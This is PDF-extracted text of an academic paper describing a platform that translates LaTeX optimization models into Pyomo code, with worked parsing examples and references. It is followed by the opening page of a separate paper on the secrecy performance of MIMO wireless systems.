d_ { i , j } x_ { i , j } ) \ \ \ t e x t { s u b j e c t to : } \ \ \ sum \ l i m i t s _ { j : i \ neq j }^{} ( x_ { i , j } ) = 1 \ quad \ quad \ f o r a l l i \ \ \ sum \ l i m i t s _ { i : i \ neq j }^{} ( x_ { i , j } ) = 1 \ quad \ quad \ f o r a l l j \ \ u_ { i } − u_ { j } + nx_ { i , j } \ l e q n − 1 \ quad \ quad \ f o r a l l i \ geq 2 , j \ l e q | j |−1 , i \ neq j \ \ u \ in \ mathbb Z , x \ in \ { 0 , 1 \ } \ \ which is the input for the platform. The user can either input this code directly inside the Google polymer text box or via a pre-made .tex file which can be uploaded in the corresponding field of the GUI. Either way, the MathJax Engine then renders LaTeX appropriately so the user can see the resulting compiled model live. Subject to syntax- errors, the MathJax engine might or might not render the model eventually, as naturally expected. Empty lines or spaces do not play a role, as well as commented-out lines using the standard notation (the percentage symbol %). The model file always begins with the objective function sense, the function itself, and then the sets of constraints follow, with the variables and their respective type at the end of the file. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 6/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 Figure 3 The overall flow of the implementation. From user input to solving the optimization problem or simply exporting the equivalent Pyomo model file. Full-size DOI: 10.7717/peerjcs.161/fig-3 PARSER—EXECUTION ENGINE As parser we define the part of the code (a collection of Python functions) in the back-end side of the platform which is responsible for translating the model written in LaTeX to Pyomo, the modeling component of the Python programming language. In order to effectively translate the user model input from LaTeX, we need an array of programming functions to carry out the conversion consistently since preserving the equivalence of the two is implied. The aim of the implementation is to provide minimum loss of generality in the ability to express mathematical notation for different modeling needs. A detailed description of the implemented scheme is given in Fig. 3. A modular design of different functions implemented in Python and the established communication of those (exchanging input and output-processed data) form the basic implementation concept. This type of design allows the developers to add functionality in a more clear and effective way. For instance, to upgrade the parser and support Mixed Integer Quadratic Programming (MIQP) problems, an update only to the parsing function assigned to convert the optimization objective function is required. Once the .tex model file and the .dat AMPL formatted data file are given, the platform then starts processing the model. The conversion starts by reading the variables of the model and their respective types, and then follows with component identification Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 7/19 https://peerj.com https://doi.org/10.7717/peerjcs.161/fig-3 http://dx.doi.org/10.7717/peerj-cs.161 (locating the occurrence of the variables in each constraint) and their inter-relationships (multiplication, division, summation etc.). Additionally, any summation and constraint conditional indexing schemes will be processed separately. Constraint-by-constraint the parser gradually builds the .py Pyomo abstract model file. It then merges through Pyomo the model with its data set and calls the selected solver for optimization. Pre-processing A significant amount of pre-processing takes place prior of parsing. The minimum and essential is to first tidy up the input; that is, clear empty lines and spaces, as well as reserved (by the platform) keywords that the user can include but do not play any role in functional parsing (such as the \quad command). The platform also supports the use of Greek letters. For instance, if a parameter is declared as α the platform identifies the symbol, removes the backslash and expects to find alpha in the data-file. This takes place also in the pre-processing stage. The user can also opt-out selectively the constraints by putting regular comments in LaTeX, with the insertion of the percentage symbol (%) in the beginning of each expression. Once done, we attempt to simplify some types of mathematical expressions in order to be able to better process them later on. More specifically, we have two main functions that handle fractions and common factor (distributive expressions) simplifications. For example: AiBj Di is then converted to: (AiBj)/Di and β(α+1) is converted as expected to: βα+β when handling fractions, the user can employ the frac environment to generate them; the parser in the background always though processes the analytic form (the same applies with the distributive form of multiplications), no matter if the initial input was done using the frac environment. This keeps the basic component identification functions intact, since their input is transformed first to the acceptable analytical format. Instead of transforming the parsing functions, we transform the input in the acceptable format. However, the user does not lose either functionality or flexibility, as this takes place in the background. To put it simply, either the user inputs the analytic form of an expression or the compact, the parser is still able to function correctly. To frame the capabilities of the parser, we will now describe how the user can define optimization models in the platform with a given example and the successful parsing to Pyomo. The parser first attempts to split the model into its three major distinct parts: • the objective function • the sets of constraints • the types of the variables defined These three parts are in a way independent but interconnected as well. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 8/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 Processing variables The parser first attempts to read the variables and their respective domain space (type). The platform is case sensitive since it is based on Pyomo. The processing is done using string manipulation functions, therefore the use of regular expressions in Python was essential and effective. Reasonably, the focus was on consistency and reliability, rather computational performance mainly due to the lightweight workload of the processing demands in general. In order to do that, the parser uses keywords as identifiers while scanning from the top to the bottom of the manually curated .tex file which contains the abstract model in LaTeX. For the three respective different parts mentioned earlier, the corresponding identifiers are: 1. Objective function: {minimize, maximize} 2. Sets of constraints: {\leq, \geq, =} 3. Variables and their types: {\mathbb , {0,1}} This helps separate the processing into sections. Each section is analyzed and passes the information in Pyomo syntax in the .py output model file. Variable types can appear in the following way: • \in \mathbb R for Real numbers (∈R) • \in \mathbb R_+ for non-negative Real numbers (∈R+) • \in \mathbb R_{*}^{+} for positive Real numbers (∈R+ ∗ ) • \in \{0,1\} for binary variables (∈{0,1}) • \in \mathbb Z for integers (∈Z) • \in \mathbb Z_+ for non-negative integers (∈Z+) • \in \mathbb Z_{*}^{+} for positive integers (∈Z+ ∗ ) In order to avoid confusion between lowercase and uppercase, the identifiers are converted to uppercase prior of comparison. Upon locating these keywords, the parser separates the processing and starts calling the corresponding functions. Once the variables and their types are processed (expected to be found at the bottom of the mathematical definition of the model), the parser then creates a list of strings for the names of the variables. This is one of the crucial structures of the parser and utilized alongside the entire run-time of the conversion process. A list of the same length, which holds the types of each respective variable, is also created. The platform in general uses Python lists to store information about variables, index sets, parameters, scalars etc. Decomposing constraints and objective function expressions Our approach for understanding the inter-mathematical relationships between the variables and the parameters relied on exploiting the fundamental characteristics of Linear Programming: Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 9/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 Figure 4 A simple constraint having its components (partially) decomposed and therefore identified; summations, operators, scalars and numerical quantities. Full-size DOI: 10.7717/peerjcs.161/fig-4 • Proportionality • Additivity • Divisibility These mathematical relationships can help us understand the structure of the expressions and how to decompose them. By decomposition we define the fragmentation of each mathematical expression at each line of the .tex input model file into the corresponding variables, parameters, summations etc. so as we can process the given information accordingly. A simple graphical example is given in Fig. 4. The decomposition with the regular expressions is naturally done via the strings of the possible operators found, that is: addition, subtraction, division (+,−,/), since the asterisk to denote multiplication (∗or ·) is usually omitted in the way we describe the mathematical expressions (e.g., we write ax to describe coefficient a being multiplied by variable x). In some cases however it is imperative to use the asterisk to decompose a multiplication. For example, say Ds is a parameter and s is also a variable in the same model. There is no possible way to tell whether the expression Ds actually means D*s or if it is about a new parameter altogether, since the parameters are not explicitly defined in the model definition (as in AMLs). Adding to that the fact that for the scalars there is no associated underscore character to identify the parameter as those are not associated with index sets, the task is even more challenging. Therefore, we should write D*s if D is a scalar. As for parameters with index sets, for example Dsisi causes no confusion for the parser because the decomposition based on the underscore character clearly reveals two separate components. In this way, the platform also identifies new parameters. This means that since we know, for instance, that s is a variable but Ds is not, we can dynamically identify Ds on the fly (as Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 10/19 https://peerj.com https://doi.org/10.7717/peerjcs.161/fig-4 http://dx.doi.org/10.7717/peerj-cs.161 we scan the current constraint) as being a parameter which is evidently multiplied with variable s, both having index set i associated with them. However, we need to pay attention on components appearing iteratively in different or in the same sets of constraints; did we have the component already appearing previously in the model again? In that case we do not have to declare it again in the Pyomo model as a new quantity, as that would cause a modeling error. By declaration we mean the real-time execution of a Python command that creates the associated terms inside the Pyomo abstract objected-oriented (OO) model. For instance if a set i is identified, the string model.i=Set(dimen=1) is first written inside the text version of the Pyomo model file, and then on-the-fly executed independently inside the already parsing Python function using the exec command. The execution commands run in a sequential manner. All the different possible cases of relationships between parameters and variables are dynamically identified, and the parser keeps track of the local (per constraint) and global (per model) list of parameters identified while scanning the model in dynamically growing lists. Dynamic identification of the parameters and index sets is one of the elegant features of the platform, since in most Algebraic Modeling Languages (AMLs) the user explicitly defines the model parameters one-by-one. In our case, this is done in an intelligent automated manner. Another important aspect of the decomposition process is the identification of the constraint type (<=,=,>=), since the position of the operator is crucial to separate the left and the right hand side of the constraint. This is handled by an independent function. Decomposition also helps identify Quadratic terms. By automatic conversion of the caret symbol to ∗∗ (as this is one of the ways to denote power of a variable in Pyomo language) the split function carefully transfers this information intact to the Pyomo model. Summations and conditional indexing Summation terms need to be enclosed inside parentheses (···), even with a single component. This accelerates identification of the summation terms with clarity and consistency. Summations are in a way very different than processing a simplified mathematical expression in the sense that we impose restrictions on how a summation can be used. First of all, the corresponding function to process summations tries to identify how many summation expressions exist in each constraint at a time. Their respective indexing expressions are extracted and then sent back to the index identification functions to be processed. The assignment of conditional indexing with the corresponding summation is carefully managed. Then, the summation commands for the Pyomo model file are gradually built. Summations can be expressed in the following form, and two different fields can be utilized to exploit conditional indexing (upper and lower brackets): \ sum \ l i m i t s _ { p : X_{n , p } = 1}^{}(1− sb_ {p , k } ) which then compiles to: ∑ p:Xn,p=1(1−sbp,k) This means that the summation will be executed for all values of p, (that is for p=1 : |p|) but only when Xn,p=1 at the same time. If we want to use multiple and stacked summations Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 11/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 (double, triple etc.) we can express them in the same way by adding the indexes for which the summation will be generated, as for example: \ sum \ l i m i t s _ { i , j }^ {} ( X_{ i , j } ) which then compiles to: ∑ i,j(Xi,j) and will run for the full cardinality of sets i,j. Dynamic (sparse) sets imposed on constraints can be expressed as: X_{ i , j } = Y_{ i , j } \ f o r a l l ( i , j ) \ in C \ \ which then compiles to: Xi,j =Yi,j ∀(i,j)∈C This means that the constraint is being generated only for those values of (i,j) which belong to the dynamic set C. In order to achieve proper and precise processing of summations and conditional indexing, we have built two separate functions assigned for the respective tasks. Since specific conditional indexing schemes can take place both for the generation of an entire constraint or just simply for a summation inside a constraint, two different sub-functions process this portion of information. This is done using the \forall command at the end of each constraint, which changes how the indexes are being generated for the vertical expansion of the constraints from a specific index set. Concerning summations it is done with the bottom bracket information for horizontal expansion, as we previously saw, for instance, with p :Xn,p=1. A series of challenges arise when processing summations. For instance, which components are inside a summation symbol? A variable that might appear in two different summations at the same constraint can cause confusion. Thus, using a binary list for the full length of variables and parameters present in a constraint we identify the terms which belong to each specific summation. This binary list gets re-initialized for each different summation expression. From the lower bracket of each summation symbol, the parser is expecting to understand the indexes for which the summation is being generated. This is done by either simply stating the indexes in a plain way (for instance a,b) or if a more complex expression is used, the for-loop indexes for the summations are found before the colon symbol (:). Constraint indexing At the end of each constraint, the parser identifies the ‘‘ ∀’’’ (\forall) symbol which then helps understand for which indexes the constraints are being sequentially generated (vertical expansion). For instance, ∀(i,j)∈C makes sure that the constraint is not generated for all combinations of index sets i,j, but only the ones appearing in the sparse set C. The sparse sets are being registered also on the fly, if found either inside summation indexing brackets or in the constraint general indexing (after the∀ symbol) by using the keywords \in, \notin. The simplest form of constraint indexing is for instance:∑ j:i6=j (xi,j)=1 ∀i, where the constraint is vertically expanding for all elements of set i and the summation is running for all those values of set j such that i is not equal to j. More advanced cases of Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 12/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 constraint conditional indexing are also identified, as long as each expression is separated with the previous one by using a comma. For example in: ∀i< |i|,j≥ i+1 we see each different expression separated so the parser can process the corresponding indexing. Three different functions handle identification on constraint- level and the input for the general function that combines these three, accepts as input the whole expression. We process each component (split by commas) iteratively by these three functions: 1. to identify left part (before the operator/reserved keyword/command), 2. the operator and 3. the right-hand part. For example, in i< |i|, the left part is set i, the operator is < and the right-hand part is the cardinality of set i. In this way, by adding a new operator in the acceptable operators list inside the code, we allow expansion of supported expressions in a straightforward manner. AN ILLUSTRATIVE PARSING EXAMPLE Let us now follow the sequential steps that the parser takes to convert a simple example. Consider the well-known transportation problem: minimize ∑ i,j (ci,jxi,j) subject to: ∑ j (xi,j)≤ai ∀i ∑ i (xi,j)≥bj ∀j x ∈R+ We will now provide in-depth analysis of how each of the main three parts in the model can be processed. Variables The parser first attempts to locate the line of the .tex model file that contains the variable symbols and their respective domains. This is done by trying to identify any of the previously presented reserved keywords specifically for this section. The parser reaches the bottom line by identifying the keyword mathbbR_+ in this case. Commas can separate variables belonging to the same domain, and the corresponding parsing function splits the collections of variables of the same domain and processes them separately. In this case, the parser identifies the domain and then rewinds back inside the string expression to find the variable symbols. It finds no commas, thus we collect only one variable with the symbol x. The platform then builds two Python lists with the name of the variables found and their respective types. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 13/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 Objective function The parser then reads the optimization sense (by locating the objective function expression using the keywords, in this case minimize) and tries to identify any involved variables in the objective function. In a different scenario, where not all of the model variables are present in the objective function, a routine identifies one-by-one all the remaining variables and their associated index sets in the block of the given constraint sets. The parser first attempts to locate any summation symbols. Since this is successful, the contained expression is extracted as c{i,j}x{i,j}, by locating the parentheses bounds (). In case of multiple summations, or multiple expressions inside the parentheses, we process them separately. The bounds of the summation symbol (the lower and upper brackets) respectively will be analyzed separately. In this case, the upper one is empty, so the lower one contains all the indexes for which the summation has to scale. Separated by commas, a simple extraction gives i,j to be used for the Pyomo for-loop in the expression. There is no colon identified inside the lower bracket of the summation, thus no further identification of conditional indexing is required. A split function is then applied on the extracted mathematical expression c_{i,j}x_{i,j} to begin identification of the involved terms. Since there are no operators (∗,+,−,/) we have a list containing only one item; the combined expression. It follows that the underscore characters are used to frame the names of the respective components. It is easy to split on these characters and then create a list to store the pairs of the indexes for each component. Thus, a sub-routine detects the case of having more than just one term in the summation-extracted expression. In this example, c is automatically identified as a parameter because of its associated index set which was identified with the underscore character and since it does not belong to the list of variables. The global list of parameters is then updated by adding c, as well as the parameters for the current constraint/objective expression. This helps us clarify which parameters are present in each constraint as well as the set of parameters (unique) for the model thus far, as scanning goes on. Once the parameter c and variable x are identified and registered with their respective index sets, we proceed to read the constraint sets. The parser creates expressions as the ones shown below for this kind of operations: model . i = Set ( dimen =1) \ \ model . j = Set ( dimen =1) \ \ model . c = Param ( model . i , model . j , i n i t i a l i z e = 0) \ \ model . x = Var ( model . i , model . j , domain=NonNegativeReals ) \ \ Since the objective function summation symbol was correctly identified with the respective indexes, the following code is generated and executed: def o b j _ e x p r e s s i o n ( model ) : model . F = sum( model . c [ i , j ]∗model . x [ i , j ] f o r i in model . i f o r j in model . j ) retu rn model . F model . OBJ = O b j e c t i v e ( r u l e =obj_expression , s e ns e = minimize ) Constraints Since the constraints sets are very similar, for shortness we will only analyze the first one. The parser first locates the constraint type by finding either of the following operators Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 14/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 ≤,≥,=. It then splits the constraint in two parts, left and right across this operator. This is done to carefully identify the position of the constraint type operator for placement into the Pyomo constraint expression later on. The first component the parser gives is the terms identified raw in the expression ([′x′i,j, ′a′i]). Parameter a is identified on the fly and since x is already registered as a variable and the parser proceeds to only register the new parameter by generating the following Pyomo expressions: model . a = Param ( model . i , i n i t i a l i z e = 0) The platform successfully identifies which terms belong to the summation and which do not and separates them carefully. Eventually the ∀ symbol gives the list of indexes for which the constraints are being generated. This portion of information in the structure of a Pyomo constraint definition goes in replacing X in the following piece of code: def a x b _ c o n s t r a i n t _ r u l e _ 1 ( model , X) : and the full resulting function is: def a x b _ c o n s t r a i n t _ r u l e _ 1 ( model , i ) : model . C_1= sum( model . x [ i , j ] f o r j in model . j ) <= model . a [ i ] retu rn model . C_1 model . AxbConstraint_1=C o n s t r a i n t ( model . i , r u l e = a x b _ c o n s t r a i n t _ r u l e _ 1 ) DISCUSSION Developing a parser that would be able to understand almost every different way of writing mathematical models using LaTeX is nearly impossible; however, even by framing the way the user could write down the models, there are some challenges to overcome. For instance, the naming policy for the variables and parameters. One would assume that these would cause no problems but usually this happens because even in formal modeling languages, the user states the names and the types of every component of the problem. Starting from the sense of the objective function, to the names and the types of the variables and parameters as well as their respective sizes and the names of the index sets, everything is explicitly defined. This is not the case though in this platform; the parser recognizes the parameters and index sets with no prior given information. This in turn imposes trade-offs in the way we write the mathematical notation. For instance, multiple index sets have to be separated by commas as in xi,j instead of writing xij. On the other hand, using symbolic representation of the models in LaTeX can enable the user quickly identify errors in the description of the model, the involved variables, parameters or their mathematical relationships therein. This as opposed trying to debug models that have been developed directly in a programming language or in an AML, which would make the detection of such errors or typos more challenging. By scanning a constraint, the parser quickly identifies as mentioned the associated variables. In many cases parameters and variables might have multiple occurrences in the same constraint. This creates a challenging environment to locate the relationships Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 15/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 of the parameters and the variables since they appear in multiple locations inside the string expressions and in different ways. On top of this, the name of a parameter can cause identification problems because it might be a sub/super set of the name of another parameter, e.g., parameter AB, and parameter ABC. Therefore naming conflicts are carefully resolved by the platform by meticulously identifying the exact location and occurrences of each term. The CPU time required for each step in the modeling process of the platform (conversion from LaTeX to Pyomo, Pyomo model generation, Solver) can be found in the Supplementary Information. It can be noted that the parser is the least consuming step, which clearly demonstrates the efficiency of the platform. The Pyomo model generation and solver (CPLEX in our measurements) steps and their associated CPU-time are completely outside of the parser’s control. However, it is essential to get an idea of how these timings compare to each other with the addition of this extra higher level of abstraction in the beginning of the modeling process. Challenges also arise in locating which of the terms appearing in a constraint belong to summations, and to which summations; especially when items have multiple occurrences inside a constraint, there needs to be a unique identification so as to include a parameter (or a variable) inside a specific summation or not. We addressed this with the previously introduced binary lists. Then, for each of those summation symbols, the items activated (1) are included in the summation or not (0) and the list is generated for each different summation within the expression. Additionally, another challenge constitutes the extension of the platform to support nonlinear terms, where each term itself can be a combination of various operators and mathematical functions. Finally, it is worth mentioning that the amount of lines/characters to represent a model in LaTeX in comparison with the equivalent model in Pyomo is substantially smaller. In this respect, the platform accelerates the modeling development process. CONCLUSIONS We presented a platform for rapid model generation using LaTeX as the input language for mathematical programming, starting with the classes of LP, MILP and MIQP. The platform is based on Python and parses the input to Pyomo to successfully solve the underlying optimization problems. It uses a simple GUI to facilitate model and data input based on Django as the web-framework. The user can exploit locally installed solvers or redirect to NEOS server. This prototype platform delivers transparency and clarity, speedup of the model design and development process (by significantly reducing the required characters to type the input models) and abstracts the syntax from programming languages and AMLs. It therefore delivers reproducibility and the ability to replicate scientific work in an effective manner from an audience not necessarily versed in coding. Future work could possibly involve expansion to support nonlinear terms as well as differential and algebraic equations, sanity checking and error catching on input, the ability to embed explanatory comments in the input model file which would transfer to the target AML, Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 16/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161 extending the functionality concerning bounds on the variables as well as adding further support to built-in LaTeX commands (such as\left[]) which would capture more complex mathematical relationships. ACKNOWLEDGEMENTS We would like to thank Prof. Eric Fraga and Dr. Aristotelis Kittas for useful discussions. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by The Leverhulme Trust under Grant (No. RPG-2015-240) and the UK Engineering and Physical Sciences Research Council (No. EP/M027856/1). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Leverhulme Trust under Grant: RPG-2015-240. UK Engineering and Physical Sciences Research Council: EP/M027856/1. Competing Interests The authors declare there are no competing interests. Author Contributions • Charalampos P. Triantafyllidis performed the experiments, analyzed the data, prepared figures and/or tables, performed the computational work, authored or reviewed drafts of the paper. • Lazaros G. Papageorgiou conceived and designed the experiments, analyzed the data, performed the computational work, authored or reviewed drafts of the paper, approved the final draft. Data Deposition The following information was supplied regarding data availability: The raw data used for examples presented in this paper are provided in the Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.161#supplemental-information. REFERENCES Applegate DL, Bixby RE, Chvatal V, Cook WJ. 2007. The traveling salesman problem: a computational study (Princeton Series in Applied Mathematics). Princeton: Princeton University Press. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 17/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161#supp-1 http://dx.doi.org/10.7717/peerj-cs.161#supp-1 http://dx.doi.org/10.7717/peerj-cs.161#supplemental-information http://dx.doi.org/10.7717/peerj-cs.161#supplemental-information http://dx.doi.org/10.7717/peerj-cs.161 Bertsimas D, Tsitsiklis J. 1997. Introduction to linear optimization. Third printing edition. Nashua: Athena Scientific. Bisschop J, Roelofs M. 2011. AIMMS language reference. Version 3.12. Paragon Decision Technology. Available at https://aimms.com/english/developers/resources/manuals/ language-reference/ . Cohen MC, Leung NHZ, Panchamgam K, Perakis G, Smith A. 2017. The impact of linear optimization on promotion planning. Operations Research 65(2):446–468 DOI 10.1287/opre.2016.1573. Dunning I, Huchette J, Lubin M. 2017. Jump: a modeling language for mathematical optimization. SIAM Review 59(2):295–320 DOI 10.1137/15M1020575. Erik E, Christian H, Markus I, David M, Sandra F, Gregor T, Henning B, Günter W, Jens-Uwe R. 2017. MOSAIC—enabling large-scale equation-based flow sheet optimization. Chemie Ingenieur Technik 89(5):620–635 DOI 10.1002/cite.201600114. Fourer R, Gay D, Kernighan B. 1993. AMPL: a modeling language for mathematical programming. South San Francisco: The Scientific Press. Hart WE, Laird CD, Watson J-P, Woodruff DL, Hackebeil GA, Nicholson BL, Siirola JD. 2017. Pyomo—optimization modeling in python. Second edition. Vol. 67. Berlin: Springer Science & Business Media. Hart WE, Watson J-P, Woodruff DL. 2011. Pyomo: modeling and solving mathematical programs in Python. Mathematical Programming Computation 3(3):219–260 DOI 10.1007/s12532-011-0026-8. Jackson M. 2012. Aspects of abstraction in software development. Software & Systems Modeling 11(4):495–511 DOI 10.1007/s10270-012-0259-7. Kallrath J. 2004. Modeling languages in mathematical optimization (APPLIED OPTI- MIZATION). Norwell: Kluwer Academic Publishers. Knuth DE. 1984. Literate programming. Computer Journal 27(2):97–111 DOI 10.1093/comjnl/27.2.97. Kratica J, Dugošija D, Savić A. 2014. A new mixed integer linear programming model for the multi level uncapacitated facility location problem. Applied Mathematical Modelling 38(7):2118 – 2129 DOI 10.1016/j.apm.2013.10.012. Leek JT, Peng RD. 2015. Opinion: reproducible research can still be wrong: adopting a prevention approach. Proceedings of the National Academy of Sciences of the United States of America 112(6):1645–1646 DOI 10.1073/pnas.1421412111. Liu S, Papageorgiou LG. 2018. Fair profit distribution in multi-echelon supply chains via transfer prices. Omega 80:77–94 DOI 10.1016/j.omega.2017.08.010. Lubin M, Dunning I. 2015. Computing in operations research using Julia. INFORMS Journal on Computing 27(2):238–248 DOI 10.1287/ijoc.2014.0623. McCarl BA, Meeraus A, Van der Eijk P, Bussieck M, Dirkse S, Steacy P, Nelissen F. 2013. McCarl expanded GAMS user guide, GAMS release 24.2.1. Washington, D.C., USA. Melas IN, Samaga R, Alexopoulos LG, Klamt S. 2013. Detecting and removing incon- sistencies between experimental data and signaling network topologies using integer Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 18/19 https://peerj.com https://aimms.com/english/developers/resources/manuals/language-reference/ https://aimms.com/english/developers/resources/manuals/language-reference/ http://dx.doi.org/10.1287/opre.2016.1573 http://dx.doi.org/10.1137/15M1020575 http://dx.doi.org/10.1002/cite.201600114 http://dx.doi.org/10.1007/s12532-011-0026-8 http://dx.doi.org/10.1007/s10270-012-0259-7 http://dx.doi.org/10.1093/comjnl/27.2.97 http://dx.doi.org/10.1016/j.apm.2013.10.012 http://dx.doi.org/10.1073/pnas.1421412111 http://dx.doi.org/10.1016/j.omega.2017.08.010 http://dx.doi.org/10.1287/ijoc.2014.0623 http://dx.doi.org/10.7717/peerj-cs.161 linear programming on interaction graphs. PLOS Computational Biology 9(9):1–19 DOI 10.1371/journal.pcbi.1003204. Mitsos A, Melas IN, Siminelakis P, Chairakaki AD, Saez-Rodriguez J, Alexopoulos LG. 2009. Identifying drug effects via pathway alterations using an integer linear programming optimization formulation on phosphoproteomic data. PLOS Com- putational Biology 5(12):1–11 DOI 10.1371/journal.pcbi.1000591. Mouha N, Wang Q, Gu D, Preneel B. 2012. Differential and linear cryptanalysis using mixed-integer linear programming. In: Wu C-K, Yung M, Lin D, eds. Information security and cryptology: 7th international conference, Inscrypt 2011, Beijing, China, November 30–December 3, 2011. Revised selected papers. Berlin, Heidelberg: Springer Berlin Heidelberg, 57–76 DOI 10.1007/978-3-642-34704-7_5. Nature Methods Editorial Board. 2014. Software with impact. Nature Methods 11(211) DOI 10.1038/nmeth.2880. Nicholson B, Siirola JD, Watson J-P, Zavala VM, Biegler LT. 2018. pyomo.dae: a modeling and automatic discretization framework for optimization with differential and algebraic equations. Mathematical Programming Computation 10(2):187–223 DOI 10.1007/s12532-017-0127-0. Nikolić DD. 2016. DAE tools: equation-based object-oriented modelling, simulation and optimisation software. PeerJ Computer Science 2:e54 DOI 10.7717/peerj-cs.54. Romeijn HE, Ahuja RK, Dempsey JF, Kumar A. 2006. A new linear programming approach to radiation therapy treatment planning problems. Operations Research 54(2):201–216 DOI 10.1287/opre.1050.0261. Rossum G. 1995. Python reference manual. Technical report. CWI (Centre for Mathe- matics and Computer Science), Amsterdam, The Netherlands. Silva JC, Bennett L, Papageorgiou LG, Tsoka S. 2016. A mathematical programming approach for sequential clustering of dynamic networks. The European Physical Journal B 89(2):39 DOI 10.1140/epjb/e2015-60656-5. Sitek P, Wikarek J. 2015. A hybrid framework for the modelling and optimisation of decision problems in sustainable supply chain management. International Journal of Production Research 53(21):6611–6628 DOI 10.1080/00207543.2015.1005762. Tanveer M. 2015. Robust and sparse linear programming twin support vector machines. Cognitive Computation 7(1):137–149 DOI 10.1007/s12559-014-9278-8. Triantafyllidis CP, Koppelaar RH, Wang X, Van Dam KH, Shah N. 2018. An integrated optimisation platform for sustainable resource and infrastructure planning. Environ- mental Modelling & Software 101:146–168 DOI 10.1016/j.envsoft.2017.11.034. Williams HP. 1999. Model building in mathematical programming. 4th Edition. London: Wiley. Yang L, Liu S, Tsoka S, Papageorgiou LG. 2016. Mathematical programming for piecewise linear regression analysis. Expert Systems with Applications 44:156–167 DOI 10.1016/j.eswa.2015.08.034. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 19/19 https://peerj.com http://dx.doi.org/10.1371/journal.pcbi.1003204 http://dx.doi.org/10.1371/journal.pcbi.1000591 http://dx.doi.org/10.1007/978-3-642-34704-7_5 http://dx.doi.org/10.1038/nmeth.2880 http://dx.doi.org/10.1007/s12532-017-0127-0 http://dx.doi.org/10.7717/peerj-cs.54 http://dx.doi.org/10.1287/opre.1050.0261 http://dx.doi.org/10.1140/epjb/e2015-60656-5 http://dx.doi.org/10.1080/00207543.2015.1005762 http://dx.doi.org/10.1007/s12559-014-9278-8 http://dx.doi.org/10.1016/j.envsoft.2017.11.034 http://dx.doi.org/10.1016/j.eswa.2015.08.034 http://dx.doi.org/10.7717/peerj-cs.161 work_xst34jwrn5fhhlikkhua7vjw6e ---- Submitted 7 December 2018 Accepted 13 March 2019 Published 22 April 2019 Corresponding author Kiattisak Maichalernnukul, kiattisak.m@rsu.ac.th Academic editor Shlomi Dolev Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.186 Copyright 2019 Maichalernnukul Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS On the secrecy performance of transmit- receive diversity and spatial multiplexing systems Kiattisak Maichalernnukul College of Digital Innovation and Information Technology, Rangsit University, Pathum Thani, Thailand ABSTRACT Emerging from the information-theoretic characterization of secrecy, physical-layer security exploits the physical properties of the wireless channel for security purpose. In recent years, a great deal of attention has been paid to investigating the physical-layer security issues in multiple-input multiple-output (MIMO) wireless communications. This paper analyzes the secrecy performance of transmit-receive diversity system and spatial multiplexing systems with zero-forcing equalization and minimum mean- square-error equalization. Specifically, exact and asymptotic closed-form expressions are derived for the secrecy outage probability of such MIMO systems in a Rayleigh fading environment, and the corresponding secrecy diversity orders and secrecy array gains are determined. Numerical results are presented to corroborate the analytical results and to examine the impact of various system parameters, including the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper. These contributions bring about valuable insights into the physical-layer security in MIMO wireless systems. Subjects Computer Networks and Communications, Security and Privacy Keywords Physical-layer security, Secrecy outage probability, Transmit-receive diversity, Multiple-Input Multiple-Output, Spatial multiplexing INTRODUCTION Wireless communication systems are intrinsically prone to eavesdropping because of the open nature of the wireless medium. In this context, physical-layer security arising from the information-theoretic analysis of secrecy has attracted a lot of interest so far. This approach indeed takes advantage of the physical characteristics of the radio channel to support secure communications. Groundbreaking works on physical-layer security (Wyner, 1975; Csiszár & Körner, 1978; Leung-Yan-Cheong & Hellman, 1978; Bloch et al., 2008) focused on a basic wiretap channel, where the transmitter, the legitimate receiver, and the eavesdropper possess a single antenna, and established the so-called secrecy capacity. One of their common remarks was that to have a positive secrecy capacity, the channel quality of the transmitter–receiver link has to be better than that of the transmitter-eavesdropper link. Stimulated by advances in multiple-antenna technology for wireless communications, the physical-layer security issues in multiple-input multiple-output (MIMO) wiretap How to cite this article Maichalernnukul K. 2019. On the secrecy performance of transmit-receive diversity and spatial multiplexing sys- tems. PeerJ Comput. Sci. 5:e186 http://doi.org/10.7717/peerj-cs.186 https://peerj.com mailto:kiattisak.m@rsu.ac.th mailto:kiattisak.m@rsu.ac.th https://peerj.com/academic-boards/editors/ 